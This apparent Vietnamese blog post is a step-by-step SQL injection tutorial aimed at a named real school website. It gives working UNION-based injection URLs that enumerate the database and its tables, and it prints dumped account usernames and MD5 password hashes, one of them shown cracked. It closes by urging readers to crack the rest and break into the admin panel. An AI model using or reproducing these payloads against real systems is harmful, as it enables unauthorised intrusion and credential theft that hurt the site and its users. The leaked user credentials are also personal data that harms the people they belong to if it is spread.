Home Hacking Underground SQL injection căn bản

Victim: http://nhanducschool.com/B1: kiểm tra xem victim có bị lỗi ko?
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=13'
=> lỗi

B2: dùng order by để đếm số column
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL order by 7-- (không lỗi)
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL order by 8-- (lỗi)
=> số column là 7.... thay 13 = NULL để show ra nội dung trang trống

B3: dùng union để show ra column bị lỗi
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,2,3,4,5,6,7--
=> thấy có gì lạ ko? số 2 đó :)

B4: kiểm tra phiên bản php và database name
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,version(),3,4,5,6,7--
=> php phiên bản 5.1.37-community-log

http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,database(),3,4,5,6,7--
=> database name là caring_heart_school

B5: show ra table name
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()--
=> ,category,comment,image,news,page,sub_category
nhìn vào thì có thể đoán table nào chứa id và pass rồi ^^ (account)

B6: show ra các column trong table account
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name=CHAR(97, 99, 99, 111, 117, 110, 116)--
=> acc_id,acc_username,acc_password,acc_email,acc_sta tus,acc_type,acc_phone

B7: truy vẫn các column để tìm thông tin cần thiết :)
http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(acc_username),3,4,5,6,7 from account--
=> 1,123123,3bacon,admin,ange16_9006,angel16_9006,anh kiet67,anhtrung1990,baby,babyjoy,Bao nam,baongoc,baonhi-dn,baonhi2011,bảo nhi,Bảo Trân,beliti,bemamnon,bengia,berom,betyty,bexuka20 11,bich ha,bich trang,bichhanh,bimbim6709,Binny Nguyễn,boiking,bonghongnho,cambich,camthu,chan hung,chilly,clear27000,cong,cong

http://nhanducschool.com/category.php?lang=vn&&mainId=2&&cateId=NULL UNION SELECT 1,group_concat(acc_password),3,4,5,6,7 from account--
=> e10adc3949ba59abbe56e057f20f883e,9c2d17a70d7a37fa5 9a6cb88d8950b27,8a70ea4066b62962a938b1cd14b144dd,7ededa3884561c2deda30b6d759fad99,235f353f3230798896129e6e4117945,2345f353f3230798896129e6e4117945,ad7532d5b3860a408fbe01f9455dca36,e10adc3949ba59abbe56e057f20f883e,4297f44b13955235245b2497399d7a93,0ec0ad20df9c357bbf31a5d227046312,26e15f51ca0
password đã bị mã hóa md5
=> phải crack tại các trang crack onl. thử crack đoạn mã này "9c2d17a70d7a37fa59a6cb88d8950b27" tại http://www.md5decrypter.co.uk/ xem 9c2d17a70d7a37fa59a6cb88d8950b27 = 161413
=> enjoy ^^ việc còn lại của các bạn là crack tất cả, tìm link admin và ... nữa là xong ^^
<End tut>


,
Chia Sẻ:
Magpress

MagPress

Vestibulum bibendum felis sit amet dolor auctor molestie. In dignissim eget nibh id dapibus. Fusce et suscipit orci. Aliquam sit amet urna lorem. Duis eu imperdiet nunc, non imperdiet libero.

0 comments so far,add yours

Cám ơn đã ghé thăm BlogCNTT!
- Mọi thắc mắc, gợi ý hoặc bình luận xin chia sẻ bên dưới hoặc Liên Hệ
- Hãy viết bằng tiếng Việt có dấu để mọi người dễ đọc hơn!
Thank You!

Subscribe to: Post Comments (Atom)